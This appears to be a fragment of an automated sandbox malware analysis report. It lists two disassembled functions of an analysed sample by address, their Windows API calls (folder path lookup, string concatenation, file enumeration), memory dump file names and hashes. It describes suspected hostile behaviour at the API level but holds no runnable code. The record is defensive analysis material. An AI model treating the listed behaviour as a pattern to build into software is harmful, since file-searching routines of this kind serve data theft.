                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 3ce3f87c301dc425c74bf3b12a79af17f8d607d5fb9b9e7521a3eda173e40b14
                              • Instruction ID: 5e2bb24b8c7d66e4c22470198afd4da08209deb31558cabbb2824b8dcd0a3282
                              • Opcode Fuzzy Hash: 3ce3f87c301dc425c74bf3b12a79af17f8d607d5fb9b9e7521a3eda173e40b14
                              • Instruction Fuzzy Hash: 0CF09A32A44702DBF773BBB89909BAD37E07F20721F20428DE5D8AB1C1CF6859418B56
                              Function 01004F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 01008DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 01008E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 01004F7A
                              • lstrcat.KERNEL32(?,01011070), ref: 01004F97
                              • lstrcat.KERNEL32(?,01988AF0), ref: 01004FAB
                              • lstrcat.KERNEL32(?,01011074), ref: 01004FBD
                                • Part of subcall function 01004910: wsprintfA.USER32 ref: 0100492C
                                • Part of subcall function 01004910: FindFirstFileA.KERNEL32(?,?), ref: 01004943
                                • Part of subcall function 01004910: StrCmpCA.SHLWAPI(?,01010FDC), ref: 01004971
                                • Part of subcall function 01004910: StrCmpCA.SHLWAPI(?,01010FE0), ref: 01004987
                                • Part of subcall function 01004910: FindNextFileA.KERNEL32(000000FF,?), ref: 01004B7D
                                • Part of subcall function 01004910: FindClose.KERNEL32(000000FF), ref: 01004B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: a22f3ff1f44e3b4b48e27b0e0da6afa08336cc7ccfc59937cf3ab4d69c5f8ca4
                              • Instruction ID: 6ff4aded9385bb160181a78cc0a9a2dd337f909cac1f65b8423bec933edc4124
                              • Opcode Fuzzy Hash: a22f3ff1f44e3b4b48e27b0e0da6afa08336cc7ccfc59937cf3ab4d69c5f8ca4
                              • Instruction Fuzzy Hash: 70217776900208A7D764FB70EC49EE9333CAB54700F404559B6D997188EE7596C88B91